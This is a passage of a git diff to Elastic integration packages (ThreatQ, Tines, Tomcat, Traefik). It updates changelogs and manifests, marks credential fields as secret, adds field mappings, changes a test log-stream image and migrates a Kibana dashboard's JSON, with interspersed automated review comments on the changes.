@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.25.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.24.2" changes: - description: Changed owners diff --git a/packages/ti_threatq/data_stream/threat/manifest.yml b/packages/ti_threatq/data_stream/threat/manifest.yml index 42aa9b4e0a8..91d7146315d 100644 --- a/packages/ti_threatq/data_stream/threat/manifest.yml +++ b/packages/ti_threatq/data_stream/threat/manifest.yml @@ -32,6 +32,7 @@ streams: required: true show_user: true description: The Client ID used to access the ThreatQ instance. + secret: true - name: token_url type: text title: ThreatQ Oauth2 Token URL @@ -40,6 +41,7 @@ streams: show_user: true description: The Token URL used for Oauth2 Authentication. default: https://threatqexample.com/api/token + secret: false - name: data_collection_id type: text title: ThreatQ Collection ID diff --git a/packages/ti_threatq/manifest.yml b/packages/ti_threatq/manifest.yml index d21346977d6..9752d3c3fca 100644 --- a/packages/ti_threatq/manifest.yml +++ b/packages/ti_threatq/manifest.yml @@ -1,13 +1,13 @@ name: ti_threatq title: ThreatQuotient -version: "1.24.2" +version: "1.25.0" description: Ingest threat intelligence indicators from ThreatQuotient with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: ["security", "threat_intel"] conditions: kibana: - version: ^8.11.0 + version: ^8.12.0 icons: - src: /img/threatq.svg title: ThreatQuotient diff --git a/packages/ti_util/changelog.yml b/packages/ti_util/changelog.yml index bd9fe401abb..57eee3b7de4 100644 --- a/packages/ti_util/changelog.yml +++ b/packages/ti_util/changelog.yml 
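Review bot: `secret: true` is added to `client_id` in the first threat/manifest.yml hunk, but that var's `type:` line sits above the hunk; the tines manifest change in this same commit pairs `secret: true` with `type: password`, so if `client_id` is still `type: text` the same pairing would keep the two packages consistent. The explicit `secret: false` on `token_url` in the second hunk is a useful marker that the value was reviewed and deliberately left non-secret; a short comment such as `# Not a credential, URL only.` beside it would keep that intent visible to future edits.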
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.5.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9404 - version: "1.4.1" changes: - description: Changed owners diff --git a/packages/ti_util/manifest.yml b/packages/ti_util/manifest.yml index 28646172e7f..b6c9189f2d9 100644 --- a/packages/ti_util/manifest.yml +++ b/packages/ti_util/manifest.yml @@ -1,6 +1,6 @@ name: ti_util title: "Threat Intelligence Utilities" -version: "1.4.1" +version: "1.5.0" description: Prebuilt Threat Intelligence dashboard for Elastic Security categories: - security @@ -8,7 +8,7 @@ categories: conditions: kibana: version: ^8.5.0 -format_version: "3.0.0" +format_version: "3.0.3" type: integration screenshots: - src: /img/threat-intel-overview.png diff --git a/packages/tines/changelog.yml b/packages/tines/changelog.yml index f5a8e092b30..65628977b24 100644 --- a/packages/tines/changelog.yml +++ b/packages/tines/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.11.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9404 +- version: "1.10.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.9.1" changes: - description: Changed owners diff --git a/packages/tines/data_stream/audit_logs/_dev/test/system/test-default-config.yml b/packages/tines/data_stream/audit_logs/_dev/test/system/test-default-config.yml index b143494b77c..0883271b0f5 100644 --- a/packages/tines/data_stream/audit_logs/_dev/test/system/test-default-config.yml +++ b/packages/tines/data_stream/audit_logs/_dev/test/system/test-default-config.yml @@ -9,3 +9,5 @@ data_stream: vars: preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 20 
diff --git a/packages/tines/data_stream/audit_logs/fields/fields.yml b/packages/tines/data_stream/audit_logs/fields/fields.yml index 11a49b0ffbe..d4be3b75721 100644 --- a/packages/tines/data_stream/audit_logs/fields/fields.yml +++ b/packages/tines/data_stream/audit_logs/fields/fields.yml @@ -45,6 +45,18 @@ type: long - name: actions type: group + fields: + - name: actionId + type: long + - name: options + type: keyword + - name: schedule + type: group + fields: + - name: cron + type: keyword + - name: timezone + type: keyword - name: agents type: flattened - name: allowedHosts diff --git a/packages/tines/data_stream/time_saved/_dev/test/system/test-default-config.yml b/packages/tines/data_stream/time_saved/_dev/test/system/test-default-config.yml index b143494b77c..b81559e4bce 100644 --- a/packages/tines/data_stream/time_saved/_dev/test/system/test-default-config.yml +++ b/packages/tines/data_stream/time_saved/_dev/test/system/test-default-config.yml @@ -9,3 +9,5 @@ data_stream: vars: preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 241 diff --git a/packages/tines/docs/README.md b/packages/tines/docs/README.md index 3c68008314b..7a0c08aca50 100644 --- a/packages/tines/docs/README.md +++ b/packages/tines/docs/README.md @@ -111,6 +111,10 @@ All fields ingested to this data stream are stored under `tines.audit_log` as ea | tines.audit_log.inputs.diagramNoteIds | | long | | tines.audit_log.inputs.inputs.actionId | | long | | tines.audit_log.inputs.inputs.actionIds | | long | +| tines.audit_log.inputs.inputs.actions.actionId | | long | +| tines.audit_log.inputs.inputs.actions.options | | keyword | +| tines.audit_log.inputs.inputs.actions.schedule.cron | | keyword | +| tines.audit_log.inputs.inputs.actions.schedule.timezone | | keyword | | tines.audit_log.inputs.inputs.agents | | flattened | | tines.audit_log.inputs.inputs.allowedHosts | | keyword | | tines.audit_log.inputs.inputs.authenticationTokenId | | long | 
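Review bot: `actions.options` is mapped as `keyword` in the new `actions` group while the sibling `agents` field stays `flattened`; if the Tines audit payload delivers `options` as an object rather than a scalar, indexing rejects the document with a mapping conflict. Worth confirming against the sample events, since the `hit_count` asserts added to the test configs in this commit only catch such a drop when the sample set contains one of these events. The enclosing `inputs` group starts outside the hunk.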
diff --git a/packages/tines/manifest.yml b/packages/tines/manifest.yml index e675cb8e6cb..f16eef73735 100644 --- a/packages/tines/manifest.yml +++ b/packages/tines/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: tines title: "Tines" -version: "1.9.1" +version: "1.11.0" description: "Tines Logs & Time Saved Reports" type: integration categories: @@ -9,7 +9,7 @@ categories: - security conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" elastic: subscription: "basic" screenshots: @@ -55,10 +55,11 @@ policy_templates: show_user: true required: false - name: auth_token - type: text + type: password title: Tines API User Account API Key show_user: true required: true + secret: true owner: github: elastic/security-service-integrations type: community diff --git a/packages/tomcat/_dev/deploy/docker/docker-compose.yml b/packages/tomcat/_dev/deploy/docker/docker-compose.yml index 1c14d8ec30a..9cbae78a295 100644 --- a/packages/tomcat/_dev/deploy/docker/docker-compose.yml +++ b/packages/tomcat/_dev/deploy/docker/docker-compose.yml @@ -7,14 +7,12 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" tomcat-log-udp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9523 -p=udp /sample_logs/tomcat-log-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9523 -p=udp /sample_logs/tomcat-log-*.log tomcat-log-tcp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9523 -p=tcp /sample_logs/tomcat-log-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9523 -p=tcp /sample_logs/tomcat-log-*.log 
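Review bot: the new `image: docker.elastic.co/observability/stream:v0.15.0` lines in both services are pinned by a mutable tag rather than a digest, so the test harness still pulls whatever that tag resolves to at run time; a `@sha256:<DIGEST>` suffix would make the environment reproducible. Dropping the `bash -c` wrapper also means `/sample_logs/tomcat-log-*.log` is no longer glob-expanded by a shell and reaches `stream` literally, which is fine only if `stream log` expands patterns itself — the hunk does not show that, so it is worth confirming.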
diff --git a/packages/traefik/changelog.yml b/packages/traefik/changelog.yml index fadc615fb77..0271f2ee970 100644 --- a/packages/traefik/changelog.yml +++ b/packages/traefik/changelog.yml @@ -1,3 +1,8 @@ +- version: "1.11.1" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/8423 - version: 1.11.0 changes: - description: Update the package format_version to 3.0.0. diff --git a/packages/traefik/kibana/dashboard/traefik-Logs-Traefik-Dashboard.json b/packages/traefik/kibana/dashboard/traefik-Logs-Traefik-Dashboard.json index 65f45fefca8..ed26c613540 100644 --- a/packages/traefik/kibana/dashboard/traefik-Logs-Traefik-Dashboard.json +++ b/packages/traefik/kibana/dashboard/traefik-Logs-Traefik-Dashboard.json 
@@ -1,789 +1,821 @@ { - "attributes": { - "description": "Dashboard for the Logs Traefik integration", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "id": "traefik-Logs-Traefik-Dashboard", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:29:45.074Z", + "created_at": "2023-11-07T17:29:45.074Z", + "version": "WzE2OCwxXQ==", + "attributes": { + "description": "Dashboard for the Logs Traefik integration", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "darkTheme": false + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hiddenLayers": [], + "isLayerTOCOpen": true, + "mapBuffer": { + "maxLat": 40.9799, + "maxLon": 135, + "minLat": -40.9799, + "minLon": -135 + }, + "mapCenter": { + "lat": 19.94277, + "lon": 0, + "zoom": 2.11 + }, + "openTOCDetails": [], + "attributes": { + "title": "Traefik logs [Logs Traefik]", + "description": "", + "uiStateJSON": "{\"isLayerTOCOpen\":true,\"openTOCDetails\":[]}", + "mapStateJSON": 
"{\"center\":{\"lat\":19.94277,\"lon\":0},\"filters\":[],\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"refreshConfig\":{\"interval\":0,\"isPaused\":true},\"settings\":{\"autoFitToDataBounds\":false,\"backgroundColor\":\"#ffffff\",\"browserLocation\":{\"zoom\":2},\"disableInteractive\":false,\"disableTooltipControl\":false,\"fixedLocation\":{\"lat\":0,\"lon\":0,\"zoom\":2},\"hideLayerControl\":false,\"hideToolbarOverlay\":false,\"hideViewControl\":false,\"initialLocation\":\"LAST_SAVED_LOCATION\",\"maxZoom\":24,\"minZoom\":0,\"showScaleControl\":false,\"showSpatialFilters\":true,\"showTimesliderToggleButton\":true,\"spatialFiltersAlpa\":0.3,\"spatialFiltersFillColor\":\"#DA8B45\",\"spatialFiltersLineColor\":\"#DA8B45\"},\"timeFilters\":{\"from\":\"now-15m\",\"to\":\"now\"},\"zoom\":2.11}", + "layerListJSON": "[{\"alpha\":1,\"id\":\"cccbea23-8692-421c-80e4-0f33e025c810\",\"includeInFitToBounds\":true,\"label\":null,\"maxZoom\":24,\"minZoom\":0,\"sourceDescriptor\":{\"isAutoSelect\":true,\"lightModeDefault\":\"road_map_desaturated\",\"type\":\"EMS_TMS\"},\"style\":{\"type\":\"TILE\"},\"type\":\"EMS_VECTOR_TILE\",\"visible\":true},{\"alpha\":0.75,\"id\":\"151240fd-cdc3-41d3-aaf8-21af553ecb69\",\"includeInFitToBounds\":true,\"joins\":[],\"label\":\"Access Map [Logs Traefik]\",\"maxZoom\":24,\"minZoom\":0,\"sourceDescriptor\":{\"applyForceRefresh\":true,\"applyGlobalQuery\":true,\"applyGlobalTime\":true,\"geoField\":\"source.geo.location\",\"id\":\"a8ada758-9bca-4cde-93b2-a62db261663d\",\"indexPatternRefName\":\"layer_1_source_index_pattern\",\"metrics\":[{\"type\":\"count\"}],\"requestType\":\"point\",\"resolution\":\"MOST_FINE\",\"type\":\"ES_GEO_GRID\"},\"style\":{\"isTimeAware\":true,\"properties\":{\"fillColor\":{\"options\":{\"color\":\"Yellow to 
Red\",\"colorCategory\":\"palette_0\",\"field\":{\"name\":\"doc_count\",\"origin\":\"source\"},\"fieldMetaOptions\":{\"isEnabled\":false,\"sigma\":3},\"type\":\"ORDINAL\"},\"type\":\"DYNAMIC\"},\"icon\":{\"options\":{\"value\":\"marker\"},\"type\":\"STATIC\"},\"iconOrientation\":{\"options\":{\"orientation\":0},\"type\":\"STATIC\"},\"iconSize\":{\"options\":{\"field\":{\"name\":\"doc_count\",\"origin\":\"source\"},\"fieldMetaOptions\":{\"isEnabled\":false,\"sigma\":3},\"maxSize\":18,\"minSize\":7},\"type\":\"DYNAMIC\"},\"labelBorderColor\":{\"options\":{\"color\":\"#FFFFFF\"},\"type\":\"STATIC\"},\"labelBorderSize\":{\"options\":{\"size\":\"SMALL\"}},\"labelColor\":{\"options\":{\"color\":\"#000000\"},\"type\":\"STATIC\"},\"labelSize\":{\"options\":{\"size\":14},\"type\":\"STATIC\"},\"labelText\":{\"options\":{\"value\":\"\"},\"type\":\"STATIC\"},\"lineColor\":{\"options\":{\"color\":\"#3d3d3d\"},\"type\":\"STATIC\"},\"lineWidth\":{\"options\":{\"size\":1},\"type\":\"STATIC\"},\"symbolizeAs\":{\"options\":{\"value\":\"circle\"}}},\"type\":\"VECTOR\"},\"type\":\"GEOJSON_VECTOR\",\"visible\":true}]" + } }, - "optionsJSON": { - "darkTheme": false + "gridData": { + "h": 15, + "i": "121accaa-e45e-414b-b9a3-f73fba06cf83", + "w": 48, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hiddenLayers": [], - "isLayerTOCOpen": true, - "mapBuffer": { - "maxLat": 40.9799, - "maxLon": 135, - "minLat": -40.9799, - "minLon": -135 - }, - "mapCenter": { - "lat": 19.94277, - "lon": 0, - "zoom": 2.11 - }, - "openTOCDetails": [] - }, - "gridData": { - "h": 15, - "i": "121accaa-e45e-414b-b9a3-f73fba06cf83", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "121accaa-e45e-414b-b9a3-f73fba06cf83", - "panelRefName": "panel_121accaa-e45e-414b-b9a3-f73fba06cf83", - "type": "map", - "version": "8.0.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - 
"type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-2b18aa0a-3889-45f0-9aa1-3ba3510050c3", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "2b18aa0a-3889-45f0-9aa1-3ba3510050c3": { - "columnOrder": [ - "9589a442-3d90-43f6-b4cc-1cecc12fd524", - "6d13e5b3-058b-4b1c-b5f0-fec158cc5750", - "6ff80030-787b-4fae-a4f4-7a0b0194e4ad" - ], - "columns": { - "6d13e5b3-058b-4b1c-b5f0-fec158cc5750": { - "customLabel": true, - "dataType": "number", - "isBucketed": true, - "label": "http.response.status_code: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "6ff80030-787b-4fae-a4f4-7a0b0194e4ad", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "http.response.status_code" - }, - "6ff80030-787b-4fae-a4f4-7a0b0194e4ad": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "scale": "ratio", - "sourceField": "Records" - }, - "9589a442-3d90-43f6-b4cc-1cecc12fd524": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "(data_stream.dataset:traefik.access)" + "panelIndex": "121accaa-e45e-414b-b9a3-f73fba06cf83", + "type": "map", + "version": "8.4.0" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "2efa927c-4fd1-4073-9b78-8ef6ec27200d", + "w": 48, + "x": 0, + "y": 15 + }, + "panelIndex": "2efa927c-4fd1-4073-9b78-8ef6ec27200d", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + 
}, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-2b18aa0a-3889-45f0-9aa1-3ba3510050c3", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "2b18aa0a-3889-45f0-9aa1-3ba3510050c3": { + "columnOrder": [ + "9589a442-3d90-43f6-b4cc-1cecc12fd524", + "6d13e5b3-058b-4b1c-b5f0-fec158cc5750", + "6ff80030-787b-4fae-a4f4-7a0b0194e4ad" + ], + "columns": { + "6d13e5b3-058b-4b1c-b5f0-fec158cc5750": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "http.response.status_code: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "6ff80030-787b-4fae-a4f4-7a0b0194e4ad", + "type": "column" }, - "visualization": { - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "6ff80030-787b-4fae-a4f4-7a0b0194e4ad" - ], - "layerId": "2b18aa0a-3889-45f0-9aa1-3ba3510050c3", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "6d13e5b3-058b-4b1c-b5f0-fec158cc5750", - "xAccessor": "9589a442-3d90-43f6-b4cc-1cecc12fd524", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "6ff80030-787b-4fae-a4f4-7a0b0194e4ad" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "http.response.status_code" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {} + "6ff80030-787b-4fae-a4f4-7a0b0194e4ad": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", 
+ "scale": "ratio", + "sourceField": "___records___" + }, + "9589a442-3d90-43f6-b4cc-1cecc12fd524": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "interval": "auto", + "includeEmptyRows": true + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "(data_stream.dataset:traefik.access)" + }, + "visualization": { + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 12, - "i": "2efa927c-4fd1-4073-9b78-8ef6ec27200d", - "w": 48, - "x": 0, - "y": 15 + "layers": [ + { + "accessors": [ + "6ff80030-787b-4fae-a4f4-7a0b0194e4ad" + ], + "layerId": "2b18aa0a-3889-45f0-9aa1-3ba3510050c3", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "6d13e5b3-058b-4b1c-b5f0-fec158cc5750", + "xAccessor": "9589a442-3d90-43f6-b4cc-1cecc12fd524", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "6ff80030-787b-4fae-a4f4-7a0b0194e4ad" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": true, + "legendSize": "auto" }, - "panelIndex": "2efa927c-4fd1-4073-9b78-8ef6ec27200d", - "title": "Response codes over time [Logs Traefik]", - "type": "lens", - "version": "8.0.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-ef238d74-b1e4-43f4-a941-8ffd25108069", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - 
"indexpattern": { - "layers": { - "ef238d74-b1e4-43f4-a941-8ffd25108069": { - "columnOrder": [ - "607e1467-5e59-4bd0-85fc-18a9c7a87ad0", - "54e6eb58-591a-4687-96a5-c5a86d89f84b", - "d30886a2-878c-4684-ad70-e678d5c373f1" - ], - "columns": { - "54e6eb58-591a-4687-96a5-c5a86d89f84b": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Top URLs", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "d30886a2-878c-4684-ad70-e678d5c373f1", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "url.original" - }, - "607e1467-5e59-4bd0-85fc-18a9c7a87ad0": { - "customLabel": true, - "dataType": "number", - "isBucketed": true, - "label": "http.response.status_code", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "d30886a2-878c-4684-ad70-e678d5c373f1", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "http.response.status_code" - }, - "d30886a2-878c-4684-ad70-e678d5c373f1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "scale": "ratio", - "sourceField": "Records" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "type": "lens" + }, + "title": "Response codes over time [Logs Traefik]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "b22d8a5b-a46f-4763-a884-e0032620fb37", + "w": 48, + "x": 0, + "y": 27 + }, + "panelIndex": "b22d8a5b-a46f-4763-a884-e0032620fb37", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"indexpattern-datasource-layer-ef238d74-b1e4-43f4-a941-8ffd25108069", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "ef238d74-b1e4-43f4-a941-8ffd25108069": { + "columnOrder": [ + "607e1467-5e59-4bd0-85fc-18a9c7a87ad0", + "54e6eb58-591a-4687-96a5-c5a86d89f84b", + "d30886a2-878c-4684-ad70-e678d5c373f1" + ], + "columns": { + "54e6eb58-591a-4687-96a5-c5a86d89f84b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Top URLs", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "d30886a2-878c-4684-ad70-e678d5c373f1", + "type": "column" }, - "filters": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "url.original" + }, + "607e1467-5e59-4bd0-85fc-18a9c7a87ad0": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "http.response.status_code", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "d30886a2-878c-4684-ad70-e678d5c373f1", + "type": "column" }, - "visualization": { - "columns": [ - { - "columnId": "607e1467-5e59-4bd0-85fc-18a9c7a87ad0", - "isTransposed": true - }, - { - "columnId": "607e1467-5e59-4bd0-85fc-18a9c7a87ad0", - "isTransposed": true - }, - { - "columnId": "54e6eb58-591a-4687-96a5-c5a86d89f84b", - "isTransposed": false - }, - { - "columnId": "d30886a2-878c-4684-ad70-e678d5c373f1", - "isTransposed": false - } - ], - "layerId": "ef238d74-b1e4-43f4-a941-8ffd25108069", - "layerType": "data" - } + "orderDirection": "desc", + "otherBucket": false, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "http.response.status_code" }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {} - }, - "gridData": { - "h": 12, - "i": "b22d8a5b-a46f-4763-a884-e0032620fb37", - "w": 48, - "x": 0, - "y": 27 - }, 
- "panelIndex": "b22d8a5b-a46f-4763-a884-e0032620fb37", - "title": "Response codes by top URLs [Logs Traefik]", - "type": "lens", - "version": "8.0.0" + "d30886a2-878c-4684-ad70-e678d5c373f1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "607e1467-5e59-4bd0-85fc-18a9c7a87ad0", + "isTransposed": true + }, + { + "columnId": "607e1467-5e59-4bd0-85fc-18a9c7a87ad0", + "isTransposed": true + }, + { + "columnId": "54e6eb58-591a-4687-96a5-c5a86d89f84b", + "isTransposed": false + }, + { + "columnId": "d30886a2-878c-4684-ad70-e678d5c373f1", + "isTransposed": false + } + ], + "layerId": "ef238d74-b1e4-43f4-a941-8ffd25108069", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-4197aa5d-acaf-4763-b484-11eb2549236f", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "4197aa5d-acaf-4763-b484-11eb2549236f": { - "columnOrder": [ - "2a765fd5-0372-4b9d-905f-f4b4f26a6447", - "71cbfad3-6ff2-4f28-9020-3bfe22ff57ae", - "6d5f8062-c79c-486c-9794-6573d150079e" - ], - "columns": { - "2a765fd5-0372-4b9d-905f-f4b4f26a6447": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "user_agent.name: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "6d5f8062-c79c-486c-9794-6573d150079e", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "size": 5 - }, - "scale": 
"ordinal", - "sourceField": "user_agent.name" - }, - "6d5f8062-c79c-486c-9794-6573d150079e": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "scale": "ratio", - "sourceField": "Records" - }, - "71cbfad3-6ff2-4f28-9020-3bfe22ff57ae": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "user_agent.version: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "6d5f8062-c79c-486c-9794-6573d150079e", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "user_agent.version" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "type": "lens" + }, + "title": "Response codes by top URLs [Logs Traefik]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 16, + "i": "d299d213-6e63-485b-9c58-61209d984bce", + "w": 16, + "x": 0, + "y": 39 + }, + "panelIndex": "d299d213-6e63-485b-9c58-61209d984bce", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-4197aa5d-acaf-4763-b484-11eb2549236f", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "4197aa5d-acaf-4763-b484-11eb2549236f": { + "columnOrder": [ + "2a765fd5-0372-4b9d-905f-f4b4f26a6447", + "71cbfad3-6ff2-4f28-9020-3bfe22ff57ae", + "6d5f8062-c79c-486c-9794-6573d150079e" + ], + "columns": { + "2a765fd5-0372-4b9d-905f-f4b4f26a6447": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "user_agent.name: Descending", + "operationType": "terms", + 
"params": { + "missingBucket": false, + "orderBy": { + "columnId": "6d5f8062-c79c-486c-9794-6573d150079e", + "type": "column" }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "groups": [ - "2a765fd5-0372-4b9d-905f-f4b4f26a6447", - "71cbfad3-6ff2-4f28-9020-3bfe22ff57ae" - ], - "layerId": "4197aa5d-acaf-4763-b484-11eb2549236f", - "layerType": "data", - "legendDisplay": "show", - "legendPosition": "bottom", - "metric": "6d5f8062-c79c-486c-9794-6573d150079e", - "nestedLegend": false, - "numberDisplay": "percent" - } - ], - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "shape": "donut" - } + "orderDirection": "desc", + "otherBucket": false, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "user_agent.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsPie" - }, - "enhancements": {} - }, - "gridData": { - "h": 16, - "i": "d299d213-6e63-485b-9c58-61209d984bce", - "w": 16, - "x": 0, - "y": 39 + "6d5f8062-c79c-486c-9794-6573d150079e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + }, + 